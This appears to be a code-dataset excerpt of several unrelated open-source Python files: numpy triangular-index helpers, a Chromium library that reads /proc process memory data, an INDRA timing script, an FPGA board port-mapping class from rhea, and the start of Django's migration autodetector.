each with the indices along one dimension of the array.
See also
--------
tril_indices : similar function, for lower-triangular.
mask_indices : generic function accepting an arbitrary mask function.
triu, tril
Notes
-----
.. versionadded:: 1.4.0
Examples
--------
Compute two different sets of indices to access 4x4 arrays, one for the
upper triangular part starting at the main diagonal, and one starting two
diagonals further right:
>>> iu1 = np.triu_indices(4)
>>> iu2 = np.triu_indices(4, 2)
Here is how they can be used with a sample array:
>>> a = np.arange(16).reshape(4, 4)
>>> a
array([[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[12, 13, 14, 15]])
Both for indexing:
>>> a[iu1]
array([ 0, 1, 2, 3, 5, 6, 7, 10, 11, 15])
And for assigning values:
>>> a[iu1] = -1
>>> a
array([[-1, -1, -1, -1],
[ 4, -1, -1, -1],
[ 8, 9, -1, -1],
[12, 13, 14, -1]])
These cover only a small part of the whole array (two diagonals right
of the main one):
>>> a[iu2] = -10
>>> a
array([[ -1, -1, -10, -10],
[ 4, -1, -1, -10],
[ 8, 9, -1, -1],
[ 12, 13, 14, -1]])
"""
return mask_indices(n,triu,k)
def triu_indices_from(arr,k=0):
"""
Return the indices for the upper-triangle of an (n, n) array.
See `triu_indices` for full details.
Parameters
----------
arr : array_like
The indices will be valid for square arrays whose dimensions are the same as those of `arr`.
k : int, optional
Diagonal offset (see `triu` for details).
See Also
--------
triu_indices, triu
Notes
-----
.. versionadded:: 1.4.0
"""
if not (arr.ndim == 2 and arr.shape[0] == arr.shape[1]):
raise ValueError("input array must be 2-d and square")
return triu_indices(arr.shape[0],k)
| bsd-3-clause |
ChronoMonochrome/android_external_chromium_org | tools/linux/procfs.py | 23 | 20724 | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# A Python library to read and store procfs (/proc) information on Linux.
#
# Each information storage class in this file stores data as close to the
# original as reasonably possible. Translation is done when requested, which
# makes it always possible to probe the original data.
import collections
import logging
import os
import re
import struct
import sys
class _NullHandler(logging.Handler):
def emit(self, record):
pass
_LOGGER = logging.getLogger('procfs')
_LOGGER.addHandler(_NullHandler())
class ProcStat(object):
"""Reads and stores information in /proc/pid/stat."""
_PATTERN = re.compile(r'^'
'(?P<PID>-?[0-9]+) '
'\((?P<COMM>.+)\) '
'(?P<STATE>[RSDZTW]) '
'(?P<PPID>-?[0-9]+) '
'(?P<PGRP>-?[0-9]+) '
'(?P<SESSION>-?[0-9]+) '
'(?P<TTY_NR>-?[0-9]+) '
'(?P<TPGID>-?[0-9]+) '
'(?P<FLAGS>[0-9]+) '
'(?P<MINFIT>[0-9]+) '
'(?P<CMINFIT>[0-9]+) '
'(?P<MAJFIT>[0-9]+) '
'(?P<CMAJFIT>[0-9]+) '
'(?P<UTIME>[0-9]+) '
'(?P<STIME>[0-9]+) '
'(?P<CUTIME>[0-9]+) '
'(?P<CSTIME>[0-9]+) '
'(?P<PRIORITY>[0-9]+) '
'(?P<NICE>[0-9]+) '
'(?P<NUM_THREADS>[0-9]+) '
'(?P<ITREALVALUE>[0-9]+) '
'(?P<STARTTIME>[0-9]+) '
'(?P<VSIZE>[0-9]+) '
'(?P<RSS>[0-9]+) '
'(?P<RSSLIM>[0-9]+) '
'(?P<STARTCODE>[0-9]+) '
'(?P<ENDCODE>[0-9]+) '
'(?P<STARTSTACK>[0-9]+) '
'(?P<KSTKESP>[0-9]+) '
'(?P<KSTKEIP>[0-9]+) '
'(?P<SIGNAL>[0-9]+) '
'(?P<BLOCKED>[0-9]+) '
'(?P<SIGIGNORE>[0-9]+) '
'(?P<SIGCATCH>[0-9]+) '
'(?P<WCHAN>[0-9]+) '
'(?P<NSWAP>[0-9]+) '
'(?P<CNSWAP>[0-9]+) '
'(?P<EXIT_SIGNAL>[0-9]+) '
'(?P<PROCESSOR>[0-9]+) '
'(?P<RT_PRIORITY>[0-9]+) '
'(?P<POLICY>[0-9]+) '
'(?P<DELAYACCT_BLKIO_TICKS>[0-9]+) '
'(?P<GUEST_TIME>[0-9]+) '
'(?P<CGUEST_TIME>[0-9]+)', re.IGNORECASE)
def __init__(self, raw, pid, vsize, rss):
self._raw = raw
self._pid = pid
self._vsize = vsize
self._rss = rss
@staticmethod
def load_file(stat_f):
raw = stat_f.readlines()
stat = ProcStat._PATTERN.match(raw[0])
return ProcStat(raw,
stat.groupdict().get('PID'),
stat.groupdict().get('VSIZE'),
stat.groupdict().get('RSS'))
@staticmethod
def load(pid):
with open(os.path.join('/proc', str(pid), 'stat'), 'r') as stat_f:
return ProcStat.load_file(stat_f)
@property
def raw(self):
return self._raw
@property
def pid(self):
return int(self._pid)
@property
def vsize(self):
return int(self._vsize)
@property
def rss(self):
return int(self._rss)
class ProcStatm(object):
"""Reads and stores information in /proc/pid/statm."""
_PATTERN = re.compile(r'^'
'(?P<SIZE>[0-9]+) '
'(?P<RESIDENT>[0-9]+) '
'(?P<SHARE>[0-9]+) '
'(?P<TEXT>[0-9]+) '
'(?P<LIB>[0-9]+) '
'(?P<DATA>[0-9]+) '
'(?P<DT>[0-9]+)', re.IGNORECASE)
def __init__(self, raw, size, resident, share, text, lib, data, dt):
self._raw = raw
self._size = size
self._resident = resident
self._share = share
self._text = text
self._lib = lib
self._data = data
self._dt = dt
@staticmethod
def load_file(statm_f):
raw = statm_f.readlines()
statm = ProcStatm._PATTERN.match(raw[0])
return ProcStatm(raw,
statm.groupdict().get('SIZE'),
statm.groupdict().get('RESIDENT'),
statm.groupdict().get('SHARE'),
statm.groupdict().get('TEXT'),
statm.groupdict().get('LIB'),
statm.groupdict().get('DATA'),
statm.groupdict().get('DT'))
@staticmethod
def load(pid):
with open(os.path.join('/proc', str(pid), 'statm'), 'r') as statm_f:
return ProcStatm.load_file(statm_f)
@property
def raw(self):
return self._raw
@property
def size(self):
return int(self._size)
@property
def resident(self):
return int(self._resident)
@property
def share(self):
return int(self._share)
@property
def text(self):
return int(self._text)
@property
def lib(self):
return int(self._lib)
@property
def data(self):
return int(self._data)
@property
def dt(self):
return int(self._dt)
class ProcStatus(object):
"""Reads and stores information in /proc/pid/status."""
_PATTERN = re.compile(r'^(?P<NAME>[A-Za-z0-9_]+):\s+(?P<VALUE>.*)')
def __init__(self, raw, dct):
self._raw = raw
self._pid = dct.get('Pid')
self._name = dct.get('Name')
self._vm_peak = dct.get('VmPeak')
self._vm_size = dct.get('VmSize')
self._vm_lck = dct.get('VmLck')
self._vm_pin = dct.get('VmPin')
self._vm_hwm = dct.get('VmHWM')
self._vm_rss = dct.get('VmRSS')
self._vm_data = dct.get('VmData')
self._vm_stack = dct.get('VmStk')
self._vm_exe = dct.get('VmExe')
self._vm_lib = dct.get('VmLib')
self._vm_pte = dct.get('VmPTE')
self._vm_swap = dct.get('VmSwap')
@staticmethod
def load_file(status_f):
raw = status_f.readlines()
dct = {}
for line in raw:
status_match = ProcStatus._PATTERN.match(line)
if status_match:
match_dict = status_match.groupdict()
dct[match_dict['NAME']] = match_dict['VALUE']
else:
raise SyntaxError('Unknown /proc/pid/status format.')
return ProcStatus(raw, dct)
@staticmethod
def load(pid):
with open(os.path.join('/proc', str(pid), 'status'), 'r') as status_f:
return ProcStatus.load_file(status_f)
@property
def raw(self):
return self._raw
@property
def pid(self):
return int(self._pid)
@property
def vm_peak(self):
"""Returns a high-water (peak) virtual memory size in kilo-bytes."""
if self._vm_peak.endswith('kB'):
return int(self._vm_peak.split()[0])
raise ValueError('VmPeak is not in kB.')
@property
def vm_size(self):
"""Returns a virtual memory size in kilo-bytes."""
if self._vm_size.endswith('kB'):
return int(self._vm_size.split()[0])
raise ValueError('VmSize is not in kB.')
@property
def vm_hwm(self):
"""Returns a high-water (peak) resident set size (RSS) in kilo-bytes."""
if self._vm_hwm.endswith('kB'):
return int(self._vm_hwm.split()[0])
raise ValueError('VmHWM is not in kB.')
@property
def vm_rss(self):
"""Returns a resident set size (RSS) in kilo-bytes."""
if self._vm_rss.endswith('kB'):
return int(self._vm_rss.split()[0])
raise ValueError('VmRSS is not in kB.')
class ProcMapsEntry(object):
"""A class representing one line in /proc/pid/maps."""
def __init__(
self, begin, end, readable, writable, executable, private, offset,
major, minor, inode, name):
self.begin = begin
self.end = end
self.readable = readable
self.writable = writable
self.executable = executable
self.private = private
self.offset = offset
self.major = major
self.minor = minor
self.inode = inode
self.name = name
def as_dict(self):
return {
'begin': self.begin,
'end': self.end,
'readable': self.readable,
'writable': self.writable,
'executable': self.executable,
'private': self.private,
'offset': self.offset,
'major': self.major,
'minor': self.minor,
'inode': self.inode,
'name': self.name,
}
class ProcMaps(object):
"""Reads and stores information in /proc/pid/maps."""
MAPS_PATTERN = re.compile(
r'^([a-f0-9]+)-([a-f0-9]+)\s+(.)(.)(.)(.)\s+([a-f0-9]+)\s+(\S+):(\S+)\s+'
r'(\d+)\s*(.*)$', re.IGNORECASE)
def __init__(self):
self._sorted_indexes = []
self._dictionary = {}
self._sorted = True
def iter(self, condition):
if not self._sorted:
self._sorted_indexes.sort()
self._sorted = True
for index in self._sorted_indexes:
if not condition or condition(self._dictionary[index]):
yield self._dictionary[index]
def __iter__(self):
if not self._sorted:
self._sorted_indexes.sort()
self._sorted = True
for index in self._sorted_indexes:
yield self._dictionary[index]
@staticmethod
def load_file(maps_f):
table = ProcMaps()
for line in maps_f:
table.append_line(line)
return table
@staticmethod
def load(pid):
with open(os.path.join('/proc', str(pid), 'maps'), 'r') as maps_f:
return ProcMaps.load_file(maps_f)
def append_line(self, line):
entry = self.parse_line(line)
if entry:
self._append_entry(entry)
return entry
@staticmethod
def parse_line(line):
matched = ProcMaps.MAPS_PATTERN.match(line)
if matched:
return ProcMapsEntry( # pylint: disable=W0212
int(matched.group(1), 16), # begin
int(matched.group(2), 16), # end
matched.group(3), # readable
matched.group(4), # writable
matched.group(5), # executable
matched.group(6), # private
int(matched.group(7), 16), # offset
matched.group(8), # major
matched.group(9), # minor
int(matched.group(10), 10), # inode
matched.group(11) # name
)
else:
return None
@staticmethod
def constants(entry):
return (entry.writable == '-' and entry.executable == '-' and re.match(
'\S+(\.(so|dll|dylib|bundle)|chrome)((\.\d+)+\w*(\.\d+){0,3})?',
entry.name))
@staticmethod
def executable(entry):
return (entry.executable == 'x' and re.match(
'\S+(\.(so|dll|dylib|bundle)|chrome)((\.\d+)+\w*(\.\d+){0,3})?',
entry.name))
@staticmethod
def executable_and_constants(entry):
return (((entry.writable == '-' and entry.executable == '-') or
entry.executable == 'x') and re.match(
'\S+(\.(so|dll|dylib|bundle)|chrome)((\.\d+)+\w*(\.\d+){0,3})?',
entry.name))
def _append_entry(self, entry):
if self._sorted_indexes and self._sorted_indexes[-1] > entry.begin:
self._sorted = False
self._sorted_indexes.append(entry.begin)
self._dictionary[entry.begin] = entry
class ProcSmaps(object):
"""Reads and stores information in /proc/pid/smaps."""
_SMAPS_PATTERN = re.compile(r'^(?P<NAME>[A-Za-z0-9_]+):\s+(?P<VALUE>.*)')
class VMA(object):
def __init__(self):
self._size = 0
self._rss = 0
self._pss = 0
def append(self, name, value):
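# Maps field names as they appear in /proc/<pid>/smaps to the attribute
# names used to store them on this VMA object.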
dct = {
'Size': '_size',
'Rss': '_rss',
'Pss': '_pss',
'Referenced': '_referenced',
'Private_Clean': '_private_clean',
'Shared_Clean': '_shared_clean',
'KernelPageSize': '_kernel_page_size',
'MMUPageSize': '_mmu_page_size',
}
if name in dct:
self.__setattr__(dct[name], value)
@property
def size(self):
if self._size.endswith('kB'):
return int(self._size.split()[0])
return int(self._size)
@property
def rss(self):
if self._rss.endswith('kB'):
return int(self._rss.split()[0])
return int(self._rss)
@property
def pss(self):
if self._pss.endswith('kB'):
return int(self._pss.split()[0])
return int(self._pss)
def __init__(self, raw, total_dct, maps, vma_internals):
self._raw = raw
self._size = total_dct['Size']
self._rss = total_dct['Rss']
self._pss = total_dct['Pss']
self._referenced = total_dct['Referenced']
self._shared_clean = total_dct['Shared_Clean']
self._private_clean = total_dct['Private_Clean']
self._kernel_page_size = total_dct['KernelPageSize']
self._mmu_page_size = total_dct['MMUPageSize']
self._maps = maps
self._vma_internals = vma_internals
@staticmethod
def load(pid):
with open(os.path.join('/proc', str(pid), 'smaps'), 'r') as smaps_f:
raw = smaps_f.readlines()
vma = None
vma_internals = collections.OrderedDict()
total_dct = collections.defaultdict(int)
maps = ProcMaps()
for line in raw:
maps_match = ProcMaps.MAPS_PATTERN.match(line)
if maps_match:
vma = maps.append_line(line.strip())
vma_internals[vma] = ProcSmaps.VMA()
else:
smaps_match = ProcSmaps._SMAPS_PATTERN.match(line)
if smaps_match:
match_dict = smaps_match.groupdict()
vma_internals[vma].append(match_dict['NAME'], match_dict['VALUE'])
total_dct[match_dict['NAME']] += int(match_dict['VALUE'].split()[0])
return ProcSmaps(raw, total_dct, maps, vma_internals)
@property
def size(self):
return self._size
@property
def rss(self):
return self._rss
@property
def referenced(self):
return self._referenced
@property
def pss(self):
return self._pss
@property
def private_clean(self):
return self._private_clean
@property
def shared_clean(self):
return self._shared_clean
@property
def kernel_page_size(self):
return self._kernel_page_size
@property
def mmu_page_size(self):
return self._mmu_page_size
@property
def vma_internals(self):
return self._vma_internals
class ProcPagemap(object):
"""Reads and stores partial information in /proc/pid/pagemap.
It picks up virtual addresses to read based on ProcMaps (/proc/pid/maps).
See https://www.kernel.org/doc/Documentation/vm/pagemap.txt for details.
"""
_BYTES_PER_PAGEMAP_VALUE = 8
_BYTES_PER_OS_PAGE = 4096
_VIRTUAL_TO_PAGEMAP_OFFSET = _BYTES_PER_OS_PAGE / _BYTES_PER_PAGEMAP_VALUE
_MASK_PRESENT = 1 << 63
_MASK_SWAPPED = 1 << 62
_MASK_FILEPAGE_OR_SHAREDANON = 1 << 61
_MASK_SOFTDIRTY = 1 << 55
_MASK_PFN = (1 << 55) - 1
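# Each pagemap entry is a 64-bit value; a sketch of how the masks above
# decode one entry (illustrative, mirroring the logic in load() below):
#   present = bool(entry & ProcPagemap._MASK_PRESENT)
#   swapped = bool(entry & ProcPagemap._MASK_SWAPPED)
#   pfn = entry & ProcPagemap._MASK_PFN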
class VMA(object):
def __init__(self, vsize, present, swapped, pageframes):
self._vsize = vsize
self._present = present
self._swapped = swapped
self._pageframes = pageframes
@property
def vsize(self):
return int(self._vsize)
@property
def present(self):
return int(self._present)
@property
def swapped(self):
return int(self._swapped)
@property
def pageframes(self):
return self._pageframes
def __init__(self, vsize, present, swapped, vma_internals, in_process_dup):
self._vsize = vsize
self._present = present
self._swapped = swapped
self._vma_internals = vma_internals
self._in_process_dup = in_process_dup
@staticmethod
def load(pid, maps):
total_present = 0
total_swapped = 0
total_vsize = 0
in_process_dup = 0
vma_internals = collections.OrderedDict()
process_pageframe_set = set()
pagemap_fd = os.open(
os.path.join('/proc', str(pid), 'pagemap'), os.O_RDONLY)
for vma in maps:
present = 0
swapped = 0
vsize = 0
pageframes = collections.defaultdict(int)
begin_offset = ProcPagemap._offset(vma.begin)
chunk_size = ProcPagemap._offset(vma.end) - begin_offset
os.lseek(pagemap_fd, begin_offset, os.SEEK_SET)
buf = os.read(pagemap_fd, chunk_size)
if len(buf) < chunk_size:
_LOGGER.warn('Failed to read pagemap at 0x%x in %d.' % (vma.begin, pid))
pagemap_values = struct.unpack(
'=%dQ' % (len(buf) / ProcPagemap._BYTES_PER_PAGEMAP_VALUE), buf)
for pagemap_value in pagemap_values:
vsize += ProcPagemap._BYTES_PER_OS_PAGE
if pagemap_value & ProcPagemap._MASK_PRESENT:
if (pagemap_value & ProcPagemap._MASK_PFN) in process_pageframe_set:
in_process_dup += ProcPagemap._BYTES_PER_OS_PAGE
else:
process_pageframe_set.add(pagemap_value & ProcPagemap._MASK_PFN)
if (pagemap_value & ProcPagemap._MASK_PFN) not in pageframes:
present += ProcPagemap._BYTES_PER_OS_PAGE
pageframes[pagemap_value & ProcPagemap._MASK_PFN] += 1
if pagemap_value & ProcPagemap._MASK_SWAPPED:
swapped += ProcPagemap._BYTES_PER_OS_PAGE
vma_internals[vma] = ProcPagemap.VMA(vsize, present, swapped, pageframes)
total_present += present
total_swapped += swapped
total_vsize += vsize
os.close(pagemap_fd)
return ProcPagemap(total_vsize, total_present, total_swapped,
vma_internals, in_process_dup)
@staticmethod
def _offset(virtual_address):
return virtual_address / ProcPagemap._VIRTUAL_TO_PAGEMAP_OFFSET
@property
def vsize(self):
return int(self._vsize)
@property
def present(self):
return int(self._present)
@property
def swapped(self):
return int(self._swapped)
@property
def vma_internals(self):
return self._vma_internals
class _ProcessMemory(object):
"""Aggregates process memory information from /proc for manual testing."""
def __init__(self, pid):
self._pid = pid
self._maps = None
self._pagemap = None
self._stat = None
self._status = None
self._statm = None
self._smaps = []
def _read(self, proc_file):
lines = []
with open(os.path.join('/proc', str(self._pid), proc_file), 'r') as proc_f:
lines = proc_f.readlines()
return lines
def read_all(self):
self.read_stat()
self.read_statm()
self.read_status()
self.read_smaps()
self.read_maps()
self.read_pagemap(self._maps)
def read_maps(self):
self._maps = ProcMaps.load(self._pid)
def read_pagemap(self, maps):
self._pagemap = ProcPagemap.load(self._pid, maps)
def read_smaps(self):
self._smaps = ProcSmaps.load(self._pid)
def read_stat(self):
self._stat = ProcStat.load(self._pid)
def read_statm(self):
self._statm = ProcStatm.load(self._pid)
def read_status(self):
self._status = ProcStatus.load(self._pid)
@property
def pid(self):
return self._pid
@property
def maps(self):
return self._maps
@property
def pagemap(self):
return self._pagemap
@property
def smaps(self):
return self._smaps
@property
def stat(self):
return self._stat
@property
def statm(self):
return self._statm
@property
def status(self):
return self._status
def main(argv):
"""The main function for manual testing."""
_LOGGER.setLevel(logging.WARNING)
handler = logging.StreamHandler()
handler.setLevel(logging.WARNING)
handler.setFormatter(logging.Formatter(
'%(asctime)s:%(name)s:%(levelname)s:%(message)s'))
_LOGGER.addHandler(handler)
pids = []
for arg in argv[1:]:
try:
pid = int(arg)
except ValueError:
raise SyntaxError("%s is not an integer." % arg)
else:
pids.append(pid)
procs = {}
for pid in pids:
procs[pid] = _ProcessMemory(pid)
procs[pid].read_all()
print '=== PID: %d ===' % pid
print ' stat: %d' % procs[pid].stat.vsize
print ' statm: %d' % (procs[pid].statm.size * 4096)
print ' status: %d (Peak:%d)' % (procs[pid].status.vm_size * 1024,
procs[pid].status.vm_peak * 1024)
print ' smaps: %d' % (procs[pid].smaps.size * 1024)
print 'pagemap: %d' % procs[pid].pagemap.vsize
print ' stat: %d' % (procs[pid].stat.rss * 4096)
print ' statm: %d' % (procs[pid].statm.resident * 4096)
print ' status: %d (Peak:%d)' % (procs[pid].status.vm_rss * 1024,
procs[pid].status.vm_hwm * 1024)
print ' smaps: %d' % (procs[pid].smaps.rss * 1024)
print 'pagemap: %d' % procs[pid].pagemap.present
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| bsd-3-clause |
sorgerlab/indra | indra/sources/isi/experiments.py | 6 | 2074 | import pickle
import time
import os
from indra.sources.isi.api import process_preprocessed
from indra.sources.isi.preprocessor import IsiPreprocessor
def abstracts_runtime():
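"""Times ISI preprocessing and reading over a growing number of PubMed
abstracts loaded from a local pickle (the paths below are specific to the
original author's machine), logging elapsed minutes to isi_experiment_log.txt."""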
pfile = '/Users/daniel/Downloads/text_content_sample.pkl'
dump = pickle.load(open(pfile, 'rb'))
all_abstracts = dump['pubmed']
# abstract_counts = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100]
# abstract_counts = [20, 40, 60, 80, 100]
# abstract_counts = [20, 50, 100, 1000, None]
# abstract_counts = [20, 50, 100, 200, 300, 400, 500]
abstract_counts = [10]
times = []
for count in abstract_counts:
print('==============================================================')
print('Count:', count)
print('==============================================================')
with open('isi_experiment_log.txt', 'a') as f:
f.write('Reading and processing ' + str(count) + ' abstracts\n')
start_time = time.time()
if count is None:
abstract_subset = all_abstracts
else:
abstract_subset = all_abstracts[:count]
assert(len(abstract_subset) == count)
preprocessed_dir = 'preprocessed_' + str(count)
os.mkdir(preprocessed_dir)
preprocessor = IsiPreprocessor(preprocessed_dir)
preprocessor.preprocess_abstract_list(abstract_subset)
output_dir = 'output_' + str(count)
os.mkdir(output_dir)
ip = process_preprocessed(preprocessor, 8, output_dir)
print('Statements:', ip.statements)
output_pickle = 'isi_processed_abstracts_' + str(count) + '.pkl'
pickle.dump(ip, open(output_pickle, 'wb'))
# How long did that take?
elapsed_s = time.time() - start_time
elapsed_min = elapsed_s / 60.0
times.append(elapsed_min)
with open('isi_experiment_log.txt', 'a') as f:
f.write('Times so far: ')
f.write(repr(times))
f.write('\n')
print('Times:')
print(times)
if __name__ == '__main__':
abstracts_runtime()
| bsd-2-clause |
cfelton/rhea | rhea/build/fpga.py | 1 | 8511 | #
# Copyright (c) 2014-2015 Christopher Felton
#
import os
import shutil
import inspect
from random import randint
from copy import copy
import myhdl
from myhdl._block import _Block as Block
from .extintf import Port
from .extintf import Clock
from .extintf import Reset
class FPGA(object):
""" """
vendor = "" # FPGA vendor, Altera, Xilinx, Lattice
device = "" # FPGA device type
family = "" # FPGA family
_name = None
# relate ports to the hardware pins
default_clocks = {}
default_resets = {}
default_ports = {}
default_extintf = {}
def __init__(self):
# default attributes
self.top = None # top-level myhdl module
self.top_params = None # top-level parameters
self.top_name = self._name # resulting name, project name etc.
self._clocks = {}
self._resets = {}
self._ports = {}
self._extintfs = {}
# walk through the default settings
for k, v in self.default_clocks.items():
self.add_clock(k, **v)
for k, v in self.default_resets.items():
self.add_reset(k, **v)
for k, v in self.default_ports.items():
self.add_port(k, **v)
for k, v in self.default_extintf.items():
self.add_extintf(k, v)
@property
def ports(self):
return self._ports
def get_port(self, port_name):
port = None
if port_name in self._ports:
port = self._ports[port_name]
return port
def has_top(self):
""" a top-level is set """
return self.top is not None
def set_top(self, top, **params):
self.top = top
self.top_params = params
if self.top_name is None:
self.top_name = top.func_name
def get_flow(self):
raise NotImplementedError
def _remove_embed_attr(self, pins, pattr):
""" removed an embedded pin attribute def if present.
"""
for v in pins:
if isinstance(v, dict):
pattr = v
pins.remove(v)
break
return pattr
def add_clock(self, name, frequency=1, pins=None, **pattr):
if isinstance(pins, (list,tuple)):
pins = pins[0]
assert isinstance(pins, (str,int)), "pins type %s" % (type(pins))
p = Port(name, pins, sigtype=Clock(0, frequency=frequency), **pattr)
self._clocks[name] = p
self._ports[name] = p
def add_reset(self, name, active, isasync, pins, **pattr):
assert isinstance(isasync, bool)
assert active in (0,1,)
p = Port(name, pins,
sigtype=Reset(0, active=active, isasync=isasync), **pattr)
# add to the reset and port dicts
self._resets[name] = p
self._ports[name] = p
def add_port(self, name, pins, **pattr):
""" add a port definition
A port definition maps a port (an HDL top-level signal name)
to a pin on the physical device including any attributes of
the pin / signal.
Example:
brd.add_port("gpio", pins=(23,24,25,26,), pullup=True)
It is acceptable to have ports with the same names.
"""
if isinstance(pins, (str, int)):
pins = [pins,]
assert isinstance(pins, (list,tuple)), \
"pins must be a list/tuple of pins (or a single str/int)"
pins = list(pins)
pattr = self._remove_embed_attr(pins, pattr)
# make sure the pin list is a number or string
for v in pins:
assert isinstance(v, (str, int))
# @todo: raise an error vs.
assert name not in self._ports, \
"{} already exists in {}".format(name, self._name)
self._ports[name] = Port(name, pins, **pattr)
def add_port_name(self, name, port, slc=None, **pattr):
""" add a new name, *name*, to an existing port, *port*.
This function is used when the default port name is known
but not the pins (if the pins are known use add_port).
A port name is linked to a default port name or a subset
(slice) is linked to the new name.
Example:
brd.add_port_name('led', 'wingC', 7)
where wingC is a 16-bit port bit-vector
To extract a range from the port, the slice class has to
be used, example:
brd.add_port_name('MSB', 'wingC', slice(16,8))
"""
p = self._ports[port]
if slc is None:
pins = p.pins
else:
if isinstance(slc, (slice, int)):
pins = p.pins[slc]
elif isinstance(slc, (list, tuple)):
pins = []
for i in slc:
if isinstance(i, int):
pins.append(p.pins[i])
else:
pins += list(p.pins[i])
else:
raise Exception("slc must be an int, a slice, or a list of these")
kws = p.pattr.copy()
kws.update(pattr)
self.add_port(name, pins, **kws)
def rename_port(self, port, name, slc=None, **pattr):
""" rename a *port* to a new *name*
This function is useful for *bootstrapping*; bootstrapping uses the
port names that exist in the object and doesn't
have a method to select from multiple definitions. Also,
useful when the top-level HDL has conflicts.
"""
pass
def add_extintf(self, name, extintf):
"""
"""
self._extintfs[name] = extintf
# @todo: extract all the ports from the extintf and
# add them to the global port dict
pass
def get_portmap(self, top=None, **kwargs):
""" given a top-level map the port definitions
This module will map the top-level MyHDL module ports
to a board definition.
Example usage:
brd = rhea.build..get_board(<board name>)
portmap = brd.get_portmatp(top=m_myhdl_module)
myhdl.toVerilog(m_myhdl_module, **portmap)
"""
if top is not None:
self.set_top(top)
# get the top-level ports and parameters
assert self.top is not None
pp = inspect.getargspec(self.top.func)
# All of the arguments without default values are treated as
# ports. An argument doesn't have to be a port, but by
# convention ports are positional arguments and parameters
# are keyword arguments. A parameter can appear in this
# list, but it can't be empty ...
# @todo: this needs some more thought, keyword args might
# be ports, need a method to determine.
hdlports = {}
if pp.defaults is not None:
pl = len(pp.args)-len(pp.defaults)
else:
pl = len(pp.args)
for pn in pp.args[:pl]:
hdlports[pn] = None
params = {}
for ii, kw in enumerate(pp.args[pl:]):
params[kw] = pp.defaults[ii]
# see if any of the ports or parameters have been overridden
if self.top_params is not None:
for k, v in self.top_params.items():
if k in hdlports:
hdlports[k] = v
for k, v in self.top_params.items():
if k in params:
params[k] = v
for k, v in kwargs.items():
if k in hdlports:
hdlports[k] = v
for k, v in kwargs.items():
if k in params:
params[k] = v
# @todo: log this information, some parameters can be too large
# to be useful dumping to screen (print).
# log.write("HDL PORTS %s" % (hdlports,))
# log.write("HDL PARAMS %s" % (params,))
# match the fpga ports to the hdl ports; note, if a port is
# a keyword argument in the top-level this will fail
# @todo: this matching code needs to be enhanced, this should
# always match a top-level port to a port def.
for port_name,port in self._ports.items():
if port_name in hdlports:
hdlports[port_name] = port.sig
port.inuse = True
for k, v in hdlports.items():
assert v is not None, "Error unspecified port %s"%(k)
# combine the ports and params
pp = hdlports.copy()
pp.update(params)
return pp
| mit |
h4r5h1t/django-hauthy | django/db/migrations/autodetector.py | 87 | 54478 | from __future__ import unicode_literals
import datetime
import re
from itertools import chain
from django.conf import settings
from django.db import models
from django.db.migrations import operations
from django.db.migrations.migration import Migration
from django.db.migrations.operations.models import AlterModelOptions
from django.db.migrations.optimizer import MigrationOptimizer
from django.db.migrations.questioner import MigrationQuestioner
from django.utils import six
from .topological_sort import stable_topological_sort
class MigrationAutodetector(object):
"""
Takes a pair of ProjectStates, and compares them to see what the
first would need doing to make it match the second (the second
usually being the project's current state).
Note that this naturally operates on entire projects at a time,
as it's likely that changes interact (for example, you can't
add a ForeignKey without having a migration to add the table it
depends on first). A user interface may offer single-app usage
if it wishes, with the caveat that it may not always be possible.
"""
def __init__(self, from_state, to_state, questioner=None):
self.from_state = from_state
self.to_state = to_state
self.questioner = questioner or MigrationQuestioner()
def changes(self, graph, trim_to_apps=None, convert_apps=None, migration_name=None):
"""
Main entry point to produce a list of applicable changes.
Takes a graph to base names on and an optional set of apps
to try and restrict to (restriction is not guaranteed)
"""
changes = self._detect_changes(convert_apps, graph)
changes = self.arrange_for_graph(changes, graph, migration_name)
if trim_to_apps:
changes = self._trim_to_apps(changes, trim_to_apps)
return changes
def deep_deconstruct(self, obj):
"""
Recursive deconstruction for a field and its arguments.
Used for full comparison for rename/alter; sometimes a single-level
deconstruction will not compare correctly.
"""
if not hasattr(obj, 'deconstruct') or isinstance(obj, type):
return obj
deconstructed = obj.deconstruct()
if isinstance(obj, models.Field):
# we have a field which also returns a name
deconstructed = deconstructed[1:]
path, args, kwargs = deconstructed
return (
path,
[self.deep_deconstruct(value) for value in args],
{
key: self.deep_deconstruct(value)
for key, value in kwargs.items()
},
)
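# Editor's note (illustrative, not part of Django): for a plain field such
# as models.CharField(max_length=100), deep_deconstruct() returns roughly
#     ('django.db.models.CharField', [], {'max_length': 100})
# i.e. the field's deconstruct() output with the name dropped and every
# argument deconstructed recursively, so two fields compare equal only if
# their full definitions match.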
def only_relation_agnostic_fields(self, fields):
"""
Return a definition of the fields that ignores field names and
what related fields actually relate to.
Used for detecting renames (as, of course, the related fields
change during renames)
"""
fields_def = []
for name, field in fields:
deconstruction = self.deep_deconstruct(field)
if field.rel and field.rel.to:
del deconstruction[2]['to']
fields_def.append(deconstruction)
return fields_def
def _detect_changes(self, convert_apps=None, graph=None):
"""
Returns a dict of migration plans which will achieve the
change from from_state to to_state. The dict has app labels
as keys and a list of migrations as values.
The resulting migrations aren't specially named, but the names
do matter for dependencies inside the set.
convert_apps is the list of apps to convert to use migrations
(i.e. to make initial migrations for, in the usual case)
graph is an optional argument that, if provided, can help improve
dependency generation and avoid potential circular dependencies.
"""
# The first phase is generating all the operations for each app
# and gathering them into a big per-app list.
# We'll then go through that list later and order it and split
# into migrations to resolve dependencies caused by M2Ms and FKs.
self.generated_operations = {}
# Prepare some old/new state and model lists, separating
# proxy models and ignoring unmigrated apps.
self.old_apps = self.from_state.concrete_apps
self.new_apps = self.to_state.apps
self.old_model_keys = []
self.old_proxy_keys = []
self.old_unmanaged_keys = []
self.new_model_keys = []
self.new_proxy_keys = []
self.new_unmanaged_keys = []
for al, mn in sorted(self.from_state.models.keys()):
model = self.old_apps.get_model(al, mn)
if not model._meta.managed:
self.old_unmanaged_keys.append((al, mn))
elif al not in self.from_state.real_apps:
if model._meta.proxy:
self.old_proxy_keys.append((al, mn))
else:
self.old_model_keys.append((al, mn))
for al, mn in sorted(self.to_state.models.keys()):
model = self.new_apps.get_model(al, mn)
if not model._meta.managed:
self.new_unmanaged_keys.append((al, mn))
elif (
al not in self.from_state.real_apps or
(convert_apps and al in convert_apps)
):
if model._meta.proxy:
